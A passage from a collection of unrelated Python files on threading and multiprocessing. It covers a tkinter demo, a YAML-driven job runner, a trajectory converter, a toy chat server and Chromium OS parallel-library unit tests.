threading.Thread(target=lambda: _run(99)),
threading.Thread(target=lambda: _run(10)),
threading.Thread(target=lambda: _run(321)),
]
[t.start() for t in threads]
_run(42)
[t.join() for t in threads]
assert sink == set([99, 10, 321, 42])
|
threads-demoAll-frm.py
|
"""
FAILS! -- tkinter doesn't support parallel GUI updates in threads
"""
import _thread, threading
from tkinter import *
from quitter import Quitter
demoModules = ['demoDlg', 'demoCheck', 'demoRadio', 'demoScale']
parts = []
def addComponents(root):
for demo in demoModules:
module = __import__(demo)
_thread.start_new_thread(build, (module,))
#threading.Thread(target=build, args=(module,)).start()
#build(module)
def build(module):
#module = __import__(demo) # this has no effect
part = module.Demo(root) # attach an instance
part.config(bd=2, relief=GROOVE) # or pass configs to Demo()
part.pack(side=LEFT, expand=YES, fill=BOTH) # grow, stretch with window
parts.append(part) # change list in-place
def dumpState():
for part in parts: # run demo report if any
print(part.__module__ + ':', end=' ')
if hasattr(part, 'report'):
part.report()
else:
print('none')
root = Tk() # make explicit root first
root.title('Frames')
Label(root, text='Multiple Frame demo', bg='white').pack()
Button(root, text='States', command=dumpState).pack(fill=X)
Quitter(root).pack(fill=X)
addComponents(root)
root.mainloop()
|
manager.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import multiprocessing
import time
#只要设定要传递的事件,就打印d
def watch(d,evt):
while True:
evt.wait()
print d
evt.clear()
if __name__ == '__main__':
m = multiprocessing.Manager()
d = m.dict()
evt = m.Event()
#启动监视字典的进程
p = multiprocessing.Process(target=watch,args=(d,evt))
p.daemon = True
p.start()
#更新字典并通知监视者
d['foo'] = 42
evt.set()
time.sleep(5)
d['bar'] = 'hello'
evt.set()
time.sleep(5)
#终止进程和管理器
p.terminate()
m.shutdown()
|
chauffeur.py
|
#!/usr/bin/env python3
## Copyright 2017 Timothy A. Handy
##
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included
## in all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
## OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
import sys
from pathlib import Path
import os
import time
import queue
import threading
import shutil
import subprocess
import yaml
import pyaml
import itertools as it
from collections import OrderedDict
import logging
import argparse
from math import sqrt, pow
# Global configuration options
driverData = dict()
userData = dict()
runData = OrderedDict()
fileData = OrderedDict()
fmtShort = dict()
fmtLong = dict()
pbsRundirs = []
pbsFiles = []
wetRun = True
# Create logger and setup to go to stdout. This allows us
# to redirect the log output via > in the command line
logger = logging.getLogger(__name__)
out_hdlr = logging.StreamHandler(sys.stdout)
out_hdlr.setFormatter(logging.Formatter('[%(asctime)s t-%(threadName)s] %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %H:%M:%S'))
out_hdlr.setLevel(logging.INFO)
logger.addHandler(out_hdlr)
logger.setLevel(logging.INFO)
#============================================
# abort: Helper function to abort execution
#============================================
def abort(msg):
"""Abort execution and print critical log message"""
callerName = sys._getframe(1).f_code.co_name
output = '['+callerName+'] '+msg
logger.critical(output)
sys.exit(1)
def logInfo(msg):
"""Wrapper for the information-level logger"""
logger.info(msg)
#===============================================
# resolveAbsPath: Convert paths to absolute
#===============================================
def resolveAbsPath(pathIn):
"""Given a path, resolve it to an absolute path"""
if(pathIn is None):
return None
pathOut = pathIn
pathOut = pathOut.replace('~',os.path.expanduser('~'))
baseDir = ''
if(not os.path.isabs(pathOut)):
baseDir = os.getcwd();
pathOut = os.path.join(baseDir,pathOut)
pathOut = os.path.normpath(pathOut)
return pathOut
#============================================
# printCfg: Helper function to print configuration
#============================================
def printCfg():
"""Pretty print current state's YAML configuration"""
cfg = dict()
cfg['driver'] = driverData
cfg['userdef'] = userData
for key in runData:
cfg[key] = runData[key]
yaml.safe_dump(cfg,sys.stdout, default_flow_style=False)
#============================================
# getThreadInfo: Helper function to get thread information
#============================================
def getThreadInfo():
"""Get information about the current thread in a dict"""
info = dict()
info['thread'] = threading.current_thread().getName()
return info
#============================================
# initDriverData: Initialize driver control
# data with defaults and then overwrite with
# config-defined values
#============================================
def initDriverData(cfg):
"""Initialize and extract driver parameters from the YAML configuration"""
# Defaults
driverData['cwd'] = os.getcwd()
driverData['scriptdir'] = os.path.realpath(__file__)
driverData['executable'] = None
driverData['rundir'] = '%(cwd)'
driverData['templatedir'] = None
driverData['type'] = 'exec'
driverData['dryrun'] = True
driverData['skipifexist'] = True
driverData['nthreads'] = 1
driverData['precommand'] = None
driverData['execcommand'] = None
driverData['postcommand'] = None
# PBS stuff
driverData['pbs_submitscript'] = '%(cwd)/pbs_submit.sh'
driverData['pbs_subcommand'] = 'qsub'
# Type formats
driverData['intFmtLong'] = 'd'
driverData['fltFmtLong'] = '12.7e'
driverData['intFmtShort'] = '05d'
driverData['fltFmtShort'] = 'f'
# Load user-defined values
cfgKey = 'driver'
if(cfgKey in cfg):
for key in cfg[cfgKey]:
if(key.lower() not in driverData):
abort('Key "'+key+'" not accepted. Options are: '+', '.join(driverData.keys()))
driverData[key.lower()] = cfg[cfgKey][key]
# Setup type -> format mappings
fmtLong[type(1)] = driverData['intFmtLong']
fmtLong[type(1.0)] = driverData['fltFmtLong']
fmtShort[type(1)] = driverData['intFmtShort']
fmtShort[type(1.0)] = driverData['fltFmtShort']
# Setup non-dict globals
wetRun = not driverData['dryrun']
#============================================
# initUserData: Initialize custom user-defined
# data
#============================================
def initUserData(cfg):
"""Extract user defined parameters from the YAML configuration"""
# Load user-defined values
cfgKey = 'userdef'
if(cfgKey in cfg):
for key in cfg[cfgKey]:
userData[key.lower()] = cfg[cfgKey][key]
#============================================
# initRunData: Initialize relevant run data
# This performs the following:
# 1) Searches for all top-level keys containing 'run'
# 2) Sorts them lexicographically
#============================================
def initRunData(cfg):
"""Extract 'run' parameters from the YAML configuration"""
# Extract all top-level keys containing 'run'
keyList = [key for key in cfg if 'run' in key.lower()]
if(not keyList):
abort('No run sections declared!')
# Sort the list
keyList = sorted(keyList)
restrNames = ['variableorder']
# Read in the individual run data
for key in keyList:
rdata = cfg[key]
varSet = {v for v in rdata['variables']}
# Construct the variableorder field if necessary
if('variableorder' not in rdata):
rdata['variableorder'] = list(varSet)
else:
# Confirm that all expected variable data is in the 'variableorder' field
if(not varSet == set(rdata['variableorder'])):
abort('Provided variable order and parsed variables are not the same')
# Ensure that all variable values are lists
# If they're not (e.g. a single int is the variable value),
# convert them to a single-element list
for v in rdata['variables']:
if(type(rdata['variables'][v]) is not list):
rdata['variables'][v] = [rdata['variables'][v]]
# Store run data
runData[key.lower()] = rdata
#============================================
# initFileData: Initialize relevant data about
# files that need to be processed.
#============================================
def initFileData(cfg):
"""Extract 'file' parameters from the YAML configuration"""
# Extract all top-level keys containing 'run'
keyList = [key for key in cfg if 'file' in key.lower()]
if(not keyList):
# abort('No file sections declared!')
return
# Sort the list
keyList = sorted(keyList)
# Read in the individual file data
for key in keyList:
# Set defaults
rdata = dict()
rdata['input'] = None
rdata['output'] = None
rdata['type'] = None
rdata['parameters'] = None
cdata = cfg[key]
for k in cdata.keys():
if(k.lower() not in rdata.keys()):
abort('File key "'+k+'" not accepted. Options are: '+', '.join(rdata.keys()))
rdata[k.lower()] = cdata[k]
# Store file data
fileData[key.lower()] = rdata
#============================================
# generateProduct: Compute the cartesian product of
# all variables in a given order. This assumes that
# order is structured as [fastest --> slowest]
# changing variable. The use of reversed(...)
# is then required due to the order in which
# itertools.product generates the cartesian product.
#============================================
def generateProduct(dicts,order):
"""Generate the Cartesian product of a dictionary of parameters"""
lists = []
for v in reversed(order):
lists.append(dicts[v])
return list(dict(zip(reversed(order), x)) for x in it.product(*lists))
#============================================
# interpolateString: Recursively replace
# parameters in a given string based on
# driver, user, and [optional] input data
#============================================
def interpolateString(inStr, inputData=None, inputFmt=None, nCalls=0):
"""Given an input string, replace all parameters and return the resolved string"""
# logInfo('[interpolateString] inStr: %s nCalls: %d type:%s'%(inStr,nCalls,type(inStr)))
MAX_RECURS = 10
begStr = '%('
endStr = ')'
if(inStr is None):
return None
if(not isinstance(inStr,str)):
return inStr
outStr = inStr
if(nCalls>=MAX_RECURS):
abort('Maximum number of recursions exceeded ({})'.format(MAX_RECURS))
# Get thread information
threadInfo = getThreadInfo()
# Move through the input string, replacing all found
# parameters in turn
countBeg = 0
indBeg = -1
indEnd = -1
while(True):
# Attempt to find the first instance of the
# parameter identifier. If found, attempt to
# find the parameter end. If the beginning
# identifier is found, there are no more parameters
# in the string and we can abort.
indBeg = inStr.find(begStr, countBeg)
if(indBeg>=0):
indEnd = inStr.find(endStr, indBeg+1)
else:
break
if(indBeg>0 and indEnd<0):
abort('Potentially malformed string "%s"'%inStr)
# Once a parameter has been identified, we will
# begin attempting to resolve it. Resolution occurs
# using defined values in the following order:
# 1) driver values
# 2) user values
# 3) input values [optional]
# Input values are passed as a dictionary to this function,
# and are meant to be used to resolve strings that depend
# on a particular choice of variable data (specific tuple of data).
#
# If an input value is used, we also check to see if the type of
# the resolved value is provided a format. If so, we use that to
# generate the resolved string. Otherwise, we use default formatting.
subStr = inStr[indBeg+len(begStr):indEnd]
inlineFmt = None
indTmp = subStr.find(':')
if(indTmp>=0):
inlineFmt = subStr[indTmp+1:]
subStr = subStr[:indTmp]
resolvedValue = None
usedInput = False
tmpFmt = None
if(threadInfo is not None):
if(subStr in threadInfo.keys()):
resolvedValue = threadInfo[subStr]
if(inputData is not None):
if(subStr in inputData.keys()):
resolvedValue = inputData[subStr]
if(subStr in userData.keys()):
resolvedValue = userData[subStr]
if(subStr in driverData.keys()):
resolvedValue = driverData[subStr]
if(resolvedValue is None):
abort('Unable to fully resolve "{}"'.format(begStr+subStr+endStr))
# Recurse if the resolution results in another parameter
resolvedValue = interpolateString(resolvedValue, inputData, inputFmt, nCalls+1)
# If the result is an evaluatable expression (encased by ` characters),
# perform the evaluation call. Evaluate string is, itself, recursive.
resolvedValue = evaluateStr(resolvedValue)
if(inlineFmt is not None):
resolvedValue = ('{:'+inlineFmt+'}').format(resolvedValue)
elif(inputFmt is not None and type(resolvedValue) in inputFmt.keys()):
resolvedValue = ('{:'+inputFmt[type(resolvedValue)]+'}').format(resolvedValue)
else:
resolvedValue = '{}'.format(resolvedValue)
# Update the string with the resolved value and prepare to find next
# parameter
outStr = outStr.replace(inStr[indBeg:indEnd+1],resolvedValue)
countBeg = indEnd+1
# Final return!
return outStr
#============================================
# evaluateStr: Recursively evaluate embedded
# expressions in the provided string
#============================================
def evaluateStr(inStr):
if(not isinstance(inStr,str)):
return inStr
inds = [i for i, char in enumerate(inStr) if char == '`']
N = len(inds)
if(N==0):
return inStr
if(N%2 != 0):
abort('Odd number of evaluator characters (`) found in {:s}'.format(inStr))
outStr = inStr
N=N/2
if(N==1):
outStr = eval(inStr[1:-1])
else:
subStr = inStr[inds[0]+1:inds[-1]-1]
evaldStr = evaluateStr(subStr)
# outStr = outStr.replace(subStr,evaldStr)
outStr = evaldStr
return outStr
#============================================
# processFiles: Process all defined files.
# Helper wrapper for processSingleFile
#============================================
def processFiles(instanceData):
if(not fileData):
return
for fileKey in fileData.keys():
processSingleFile(fileKey,instanceData)
#============================================
# processSingleFile: Process a single file
# with global and instance parameters
#============================================
def processSingleFile(fileKey,instanceData):
if(fileKey not in fileData.keys()):
abort('Attempting to process nonexistent file with key '+fileKey)
# Merge instance data (from specific run instance) and the file's parameters
data = instanceData
if('parameters' in fileData[fileKey].keys() and fileData[fileKey]['parameters']):
data = {**data,**fileData[fileKey]['parameters']}
# Load parameter template
templatefile = resolveAbsPath(interpolateString(fileData[fileKey]['input'],data))
logInfo('Loading template file {}'.format(templatefile))
if(templatefile is None):
abort('Parameter template file is None!')
with open(templatefile,'r') as pfile:
paramStr = pfile.read()
# Replace all parameterizations with driver, user, and instance data
paramStr = interpolateString(paramStr, data, fmtLong)
# Write parameter file
outputFile = resolveAbsPath(interpolateString(fileData[fileKey]['output'],data))
logInfo('Writing param file {}'.format(outputFile))
with open(outputFile,'w+') as pfile:
pfile.write(paramStr)
# If the file is of type "pbs", record its output name
if(fileData[fileKey]['type'] == 'pbs'):
logInfo('adding to pbs files: {:s}'.format(outputFile))
pbsFiles.append(outputFile)
def constructPbsSubmitScript():
if(not pbsFiles):
return
header = "#!/bin/bash"
subscript = interpolateString(driverData['pbs_submitscript'])
logInfo('Creating PBS submission script: {:s}'.format(subscript))
with open(subscript,'w+') as output:
output.write(header)
output.write('\n')
for f in pbsFiles:
path, file = os.path.split(f)
output.write('cd {:s} && {:s} {:s} && cd -\n'.format(path,driverData['pbs_subcommand'],file))
#============================================
# worker: Function called for each thread.
# Pulls a set of data off the run queue
# (from the cartesian product) and executes
# relevant activities
#============================================
def worker():
"""Execute the driver specifications for a given set of parameters (threaded)"""
while True:
data = runqueue.get()
if data is None:
return
# Copy template to working directory
workDir = resolveAbsPath(interpolateString(driverData['rundir'],data))
# If the workDir exists, skip this run
if(driverData['skipifexist'] and driverData['templatedir'] and os.path.exists(workDir)):
logInfo('Work directory {:s} exists. Skipping this run.'.format(workDir))
continue
templateDir = resolveAbsPath(interpolateString(driverData['templatedir'],data))
if(templateDir is not None):
logInfo('Copying %s to %s'%(templateDir,workDir))
if(wetRun):
shutil.copytree(templateDir,workDir,symlinks=True)
if(wetRun):
# Ensure that run directory exists. If not, create it.
if(not os.path.exists(workDir)):
logInfo('Creating run directory %s'%workDir)
path = Path(workDir)
path.mkdir(parents=True)
# Process files
processFiles(data)
if(driverData['type'] in ['param_only','setup']):
continue
# Perform postprocessing commands
if(driverData['precommand'] is not None):
precommand = interpolateString(driverData['precommand'],data)
cmdStr = 'cd %s && %s'%(workDir,interpolateString(precommand))
logInfo('Executing pre command: {}'.format(precommand))
proc = subprocess.Popen(cmdStr, shell=True)
proc.wait()
# Run executable in working directory
if(driverData['execcommand'] is not None):
execcommand = interpolateString(driverData['execcommand'],data)
cmdStr = 'cd %s && %s'%(workDir,interpolateString(execcommand))
logInfo('Executing exec command: {}'.format(execcommand))
proc = subprocess.Popen(cmdStr, shell=True)
proc.wait()
# Perform postprocessing commands
if(driverData['postcommand'] is not None):
postcommand = interpolateString(driverData['postcommand'],data)
cmdStr = 'cd %s && %s'%(workDir,postcommand)
logInfo('Executing post command: {}'.format(postcommand))
proc = subprocess.Popen(cmdStr, shell=True)
proc.wait()
#============================================
# setupParser: Setup command line argument parser
#============================================
def setupParser():
"""Setup the argument parser and return the parser object"""
parser = argparse.ArgumentParser()
parser.add_argument('-i','--input',default='input.yaml',help='specify input YAML file')
return parser
#============================================
# MAIN
#============================================
if(__name__ == "__main__"):
# Parser arguments and read YAML configuration file
parser = setupParser();
args = parser.parse_args()
with open(args.input,'r') as f:
cfg = yaml.safe_load(f)
# Initialize driver configuration
initDriverData(cfg)
# Initialize user configuration
initUserData(cfg)
# Initialize file configurations
initFileData(cfg)
# Initialize run configurations
initRunData(cfg)
# Construct cartesian product of variables for each run
runs = []
for r in runData.keys():
tmp = generateProduct(runData[r]['variables'],runData[r]['variableorder'])
# Append run parameters to each of the generated subruns
if('parameters' in runData[r].keys()):
for i in range(0,len(tmp)):
tmp[i].update(runData[r]['parameters'])
runs.extend(tmp)
# runs.extend(generateProduct(runData[r]['variables'],runData[r]['variableorder']))
runqueue = queue.Queue()
for r in runs:
logInfo('Adding run info {}'.format(r))
runqueue.put(r)
threads = [ threading.Thread(target=worker, name='{:02d}'.format(_i)) for _i in range(driverData['nthreads']) ]
for thread in threads:
thread.daemon = True
logInfo('Starting thread')
thread.start()
runqueue.put(None) # one EOF marker for each thread
# Keep master thread alive and check to see if all threads are done
while True:
time.sleep(1)
stillRunning = False
for thread in threads:
if thread.isAlive():
stillRunning = True
if(not stillRunning):
break
# Construct PBS submission script
constructPbsSubmitScript()
|
convert_state.py
|
import argparse
import os
os.environ["D4RL_SUPPRESS_IMPORT_ERROR"] = "1"
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
os.environ["OMP_NUM_THREADS"] = "1"
import os.path as osp
from multiprocessing import Process
import h5py
from mani_skill_learn.env import make_gym_env, ReplayMemory
from mani_skill_learn.utils.fileio import load_h5_as_dict_array, merge_h5_trajectory
from mani_skill_learn.utils.data import sample_element_in_dict_array, compress_size
from mani_skill_learn.utils.meta import get_total_memory, flush_print
def auto_fix_wrong_name(traj):
for key in traj:
if key in ['action', 'reward', 'done', 'env_level', 'next_env_level', 'next_env_state', 'env_state']:
traj[key + 's'] = traj[key]
del traj[key]
return traj
tmp_folder_in_docker = '/tmp'
def convert_state_representation(keys, args, worker_id, main_process_id):
env = make_gym_env(args.env_name, unwrapped=True, obs_mode=args.obs_mode)
assert hasattr(env, 'get_obs'), f'env {env} does not contain get_obs'
get_obs = env.get_obs
cnt = 0
output_file = osp.join(tmp_folder_in_docker, f'{worker_id}.h5')
if worker_id == 0:
flush_print(f'Save trajectory to {output_file}')
output_h5 = h5py.File(output_file, 'w')
input_h5 = h5py.File(args.traj_name, 'r')
for j, key in enumerate(keys):
trajectory = load_h5_as_dict_array(input_h5[key])
trajectory = auto_fix_wrong_name(trajectory)
env.reset(level=trajectory['env_levels'][0])
length = trajectory['obs'].shape[0]
if 'info_eval_info_success' in trajectory:
if 'info_keep_threshold' not in trajectory:
success = trajectory['info_eval_info_success'][-1]
else:
success = trajectory['info_eval_info_success'][-1]
keep_threshold = trajectory['info_keep_threshold'][-1]
success = success >= keep_threshold
elif 'eval_info_success' in trajectory:
success = trajectory['eval_info_success'][-1]
keep_threshold = trajectory['keep_threshold'][-1]
success = success >= keep_threshold
else:
flush_print(trajectory.keys(), 'No success info')
raise Exception("")
if not success:
if worker_id == 0:
flush_print(f'Worker {worker_id}, Skip {j + 1}/{len(keys)}, Choose {cnt}')
continue
replay = ReplayMemory(length)
next_obs = None
for i in range(length):
if next_obs is None:
env_state = sample_element_in_dict_array(trajectory['env_states'], i)
env.set_state(env_state)
obs = get_obs()
obs = compress_size(obs)
else:
obs = next_obs
# from mani_skill_learn.utils.data import get_shape_and_type
# flush_print(get_shape_and_type(obs))
# exit(0)
next_env_state = sample_element_in_dict_array(trajectory['next_env_states'], i)
env.set_state(next_env_state)
next_obs = get_obs()
next_obs = compress_size(next_obs)
item_i = {
'obs': obs,
'next_obs': next_obs,
'actions': trajectory['actions'][i],
'dones': trajectory['dones'][i],
'rewards': trajectory['rewards'][i],
}
mem = get_total_memory('G', False, init_pid=main_process_id)
replay.push(**item_i)
if worker_id == 0:
flush_print(f'Convert Trajectory: choose{cnt + 1}, {j + 1}/{len(keys)}, Step {i + 1}/{length}, total mem:{mem}')
group = output_h5.create_group(f'traj_{cnt}')
cnt += 1
replay.to_h5(group, with_traj_index=False)
output_h5.close()
flush_print(f'Finish using {output_file}')
def get_running_steps(num, n):
assert num >= n
min_steps = num // n
running_steps = []
for i in range(n):
if i < num - min_steps * n:
running_steps.append(min_steps + 1)
else:
running_steps.append(min_steps)
assert sum(running_steps) == num
return running_steps
def parse_args():
parser = argparse.ArgumentParser(description='Convert the representation of the trajectory')
# Configurations
parser.add_argument('--env-name', default='OpenCabinetDrawer_1045_link_0-v0',
help='The name of the environment')
parser.add_argument('--traj-name',
default='./debug_mani_skill/OpenCabinetDrawer_1045_link_0-v0/test/trajectory.h5',
help='The generated trajectory with some policies')
parser.add_argument('--output-name',
default='./debug_mani_skill/OpenCabinetDrawer_1045_link_0-v0/test/trajectory_pcd.h5',
help='The generated trajectory with some policies')
parser.add_argument('--max-num-traj', default=-1, type=int, help='The generated trajectory with some policies')
parser.add_argument('--obs-mode', default='pointcloud', type=str, help='The mode of the observer')
parser.add_argument('--num-procs', default=10, type=int, help='The mode of the observer')
# Convert setting
parser.add_argument('--add-random', default=False, action='store_true', help='Add random trajectory')
args = parser.parse_args()
args.traj_name = osp.abspath(args.traj_name)
args.output_name = osp.abspath(args.output_name)
return args
def main():
os.makedirs(osp.dirname(args.output_name), exist_ok=True)
with h5py.File(args.traj_name, 'r') as h5_file:
keys = sorted(h5_file.keys())
if args.max_num_traj < 0:
args.max_num_traj = len(keys)
args.max_num_traj = min(len(keys), args.max_num_traj)
args.num_procs = min(args.num_procs, args.max_num_traj)
keys = keys[:args.max_num_traj]
running_steps = get_running_steps(len(keys), args.num_procs)
flush_print(f'Num of trajs {len(keys)}', args.num_procs)
processes = []
from copy import deepcopy
for i, x in enumerate(running_steps):
p = Process(target=convert_state_representation, args=(deepcopy(keys[:x]), args, i, os.getpid()))
keys = keys[x:]
processes.append(p)
p.start()
for p in processes:
p.join()
files = []
for worker_id in range(len(running_steps)):
tmp_h5 = osp.join(tmp_folder_in_docker, f'{worker_id}.h5')
files.append(tmp_h5)
from shutil import rmtree
rmtree(args.output_name, ignore_errors=True)
merge_h5_trajectory(files, args.output_name)
for file in files:
rmtree(file, ignore_errors=True)
if __name__ == '__main__':
args = parse_args()
main()
|
2_multi_threads_ans.py
|
import time
import datetime
from threading import Thread
# a factorial method similar to exercise 1, but return the result via a result placeholder
def factorial(n: int, result: [int]):
_result = 1
print("Started calculation for n=" + str(n))
for i in range(1, n+1):
# sleep for a second - release the GIL, allowing other threads to run
time.sleep(1)
print('[{}][{}] counter = {}'.format(datetime.datetime.now().strftime("%d-%m-%Y, %H:%M:%S"), n, i))
# multiply factorial value
_result = _result * i
result[0] = _result
# to demonstrate two threads computing in parallel
if __name__ == '__main__':
result_1 = [None] * 1
thread_1 = Thread(target=factorial, args=(10, result_1))
result_2 = [None] * 1
thread_2 = Thread(target=factorial, args=(15, result_2))
# start executing both threads
thread_1.start()
thread_2.start()
# wait for both threads to finish
thread_1.join()
thread_2.join()
print('Factorial of 10 = {}'.format(result_1[0]))
print('Factorial of 15 = {}'.format(result_2[0]))
|
serve.py
|
import socketserver
import socket
import threading
import time
import random
import queue
switchboard = {}
class ChatroomQueue:
def __init__(self, name):
self.a_queue = queue.Queue()
self.b_queue = queue.Queue()
self.user_set = 0
def get_queue(self, index):
l = [self.a_queue, self.b_queue]
return l[index]
def get_queues(self):
l = [self.a_queue, self.b_queue]
x = self.user_set
self.user_set = (self.user_set + 1) % 2
return l[x], l[(x+1)%2]
class ProtoHandler(socketserver.BaseRequestHandler):
def qprint(self, message):
self.request.sendall(bytes(message+'\n','ascii'))
def handle(self):
global switchboard
try:
self.data = self.request.recv(1024).strip().decode('ascii')
if self.data not in switchboard.keys():
switchboard[self.data] = ChatroomQueue(self.data)
c_q = switchboard[self.data]
rec_q, send_q = c_q.get_queues()
while True:
msg = []
while True:
try:
m = self.request.recv(4096, socket.MSG_DONTWAIT).strip().decode('ascii')
if len(m) == 0:
c_q.user_set -= 1
print("killing thread {}".format(threading.current_thread().name))
return
msg.append(m)
except:
break
msg = ''.join(msg)
if len(msg) > 0:
send_q.put(msg)
if not rec_q.empty():
msg = rec_q.get()
self.qprint(msg)
except Exception as e:
print(e)
class ThreadProtoServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == '__main__':
host = '0.0.0.0'
port = 1234
server = ThreadProtoServer((host,port), ProtoHandler)
try:
with server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while True:
time.sleep(1)
except:
server.shutdown()
|
parallel_unittest.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for parallel library."""
from __future__ import print_function
import contextlib
import cPickle
import mock
import multiprocessing
import os
import signal
import sys
import tempfile
import time
import unittest
try:
import Queue
except ImportError:
# Python-3 renamed to "queue". We still use Queue to avoid collisions
# with naming variables as "queue". Maybe we'll transition at some point.
# pylint: disable=F0401
import queue as Queue
from chromite.lib import cros_logging as logging
from chromite.lib import cros_test_lib
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import partial_mock
from chromite.lib import timeout_util
# pylint: disable=protected-access
_BUFSIZE = 10 ** 4
_EXIT_TIMEOUT = 30
_NUM_WRITES = 100
_NUM_THREADS = 50
_TOTAL_BYTES = _NUM_THREADS * _NUM_WRITES * _BUFSIZE
_GREETING = 'hello world'
_SKIP_FLAKY_TESTS = True
class FakeMultiprocessManager(object):
"""A fake implementation of the multiprocess manager.
This is only intended for use with ParallelMock.
"""
def __enter__(self, *args, **kwargs):
return self
def __exit__(self, *args, **kwargs):
return None
def Queue(self):
return multiprocessing.Queue()
def RLock(self):
return multiprocessing.RLock()
def dict(self, *args, **kwargs):
return dict(*args, **kwargs)
def list(self, *args, **kwargs):
return list(*args, **kwargs)
class ParallelMock(partial_mock.PartialMock):
"""Run parallel steps in sequence for testing purposes.
This class updates chromite.lib.parallel to just run processes in
sequence instead of running them in parallel. This is useful for
testing.
"""
TARGET = 'chromite.lib.parallel._BackgroundTask'
ATTRS = ('ParallelTasks', 'TaskRunner')
def PreStart(self):
self.PatchObject(parallel, 'Manager', side_effect=FakeMultiprocessManager)
partial_mock.PartialMock.PreStart(self)
@contextlib.contextmanager
def ParallelTasks(self, steps, max_parallel=None, halt_on_error=False):
assert max_parallel is None or isinstance(max_parallel, (int, long))
assert isinstance(halt_on_error, bool)
try:
yield
finally:
for step in steps:
step()
def TaskRunner(self, queue, task, onexit=None, task_args=None,
task_kwargs=None):
# Setup of these matches the original code.
if task_args is None:
task_args = []
elif not isinstance(task_args, list):
task_args = list(task_args)
if task_kwargs is None:
task_kwargs = {}
try:
while True:
# Wait for a new item to show up on the queue. This is a blocking wait,
# so if there's nothing to do, we just sit here.
x = queue.get()
if isinstance(x, parallel._AllTasksComplete):
# All tasks are complete, so we should exit.
break
x = task_args + list(x)
task(*x, **task_kwargs)
finally:
if onexit:
onexit()
class BackgroundTaskVerifier(partial_mock.PartialMock):
"""Verify that queues are empty after BackgroundTaskRunner runs.
BackgroundTaskRunner should always empty its input queues, even if an
exception occurs. This is important for preventing a deadlock in the case
where a thread fails partway through (e.g. user presses Ctrl-C before all
input can be processed).
"""
TARGET = 'chromite.lib.parallel'
ATTRS = ('BackgroundTaskRunner',)
@contextlib.contextmanager
def BackgroundTaskRunner(self, task, *args, **kwargs):
queue = kwargs.setdefault('queue', multiprocessing.Queue())
args = [task] + list(args)
try:
with self.backup['BackgroundTaskRunner'](*args, **kwargs):
yield queue
finally:
try:
queue.get(False)
except Queue.Empty:
pass
else:
raise AssertionError('Expected empty queue after BackgroundTaskRunner')
class TestManager(cros_test_lib.TestCase):
"""Test parallel.Manager()."""
def testSigint(self):
"""Tests that parallel.Manager() ignores SIGINT."""
with parallel.Manager() as manager:
queue = manager.Queue()
os.kill(manager._process.pid, signal.SIGINT)
with self.assertRaises(Queue.Empty):
queue.get(block=False)
def testSigterm(self):
"""Tests that parallel.Manager() ignores SIGTERM."""
with parallel.Manager() as manager:
queue = manager.Queue()
os.kill(manager._process.pid, signal.SIGTERM)
with self.assertRaises(Queue.Empty):
queue.get(block=False)
class TestBackgroundWrapper(cros_test_lib.TestCase):
"""Unittests for background wrapper."""
def setUp(self):
self.tempfile = None
def tearDown(self):
# Wait for children to exit.
try:
timeout_util.WaitForReturnValue([[]], multiprocessing.active_children,
timeout=_EXIT_TIMEOUT)
except timeout_util.TimeoutError:
pass
# Complain if there are any children left over.
active_children = multiprocessing.active_children()
for child in active_children:
if hasattr(child, 'Kill'):
child.Kill(signal.SIGKILL, log_level=logging.WARNING)
child.join()
self.assertEqual(multiprocessing.active_children(), [])
self.assertEqual(active_children, [])
def wrapOutputTest(self, func):
# Set _PRINT_INTERVAL to a smaller number to make it easier to
# reproduce bugs.
with mock.patch.multiple(parallel._BackgroundTask, PRINT_INTERVAL=0.01):
with tempfile.NamedTemporaryFile(bufsize=0) as output:
with mock.patch.multiple(sys, stdout=output):
func()
with open(output.name, 'r', 0) as tmp:
tmp.seek(0)
return tmp.read()
class TestHelloWorld(TestBackgroundWrapper):
"""Test HelloWorld output in various background environments."""
def setUp(self):
self.printed_hello = multiprocessing.Event()
def _HelloWorld(self):
"""Write 'hello world' to stdout."""
sys.stdout.write('hello')
sys.stdout.flush()
sys.stdout.seek(0)
self.printed_hello.set()
# Wait for the parent process to read the output. Once the output
# has been read, try writing 'hello world' again, to be sure that
# rewritten output is not read twice.
time.sleep(parallel._BackgroundTask.PRINT_INTERVAL * 10)
sys.stdout.write(_GREETING)
sys.stdout.flush()
def _ParallelHelloWorld(self):
"""Write 'hello world' to stdout using multiple processes."""
with parallel.Manager() as manager:
queue = manager.Queue()
with parallel.BackgroundTaskRunner(self._HelloWorld, queue=queue):
queue.put([])
self.printed_hello.wait()
def VerifyDefaultQueue(self):
"""Verify that BackgroundTaskRunner will create a queue on it's own."""
with parallel.BackgroundTaskRunner(self._HelloWorld) as queue:
queue.put([])
self.printed_hello.wait()
def testParallelHelloWorld(self):
"""Test that output is not written multiple times when seeking."""
out = self.wrapOutputTest(self._ParallelHelloWorld)
self.assertEquals(out, _GREETING)
def testMultipleHelloWorlds(self):
"""Test that multiple threads can be created."""
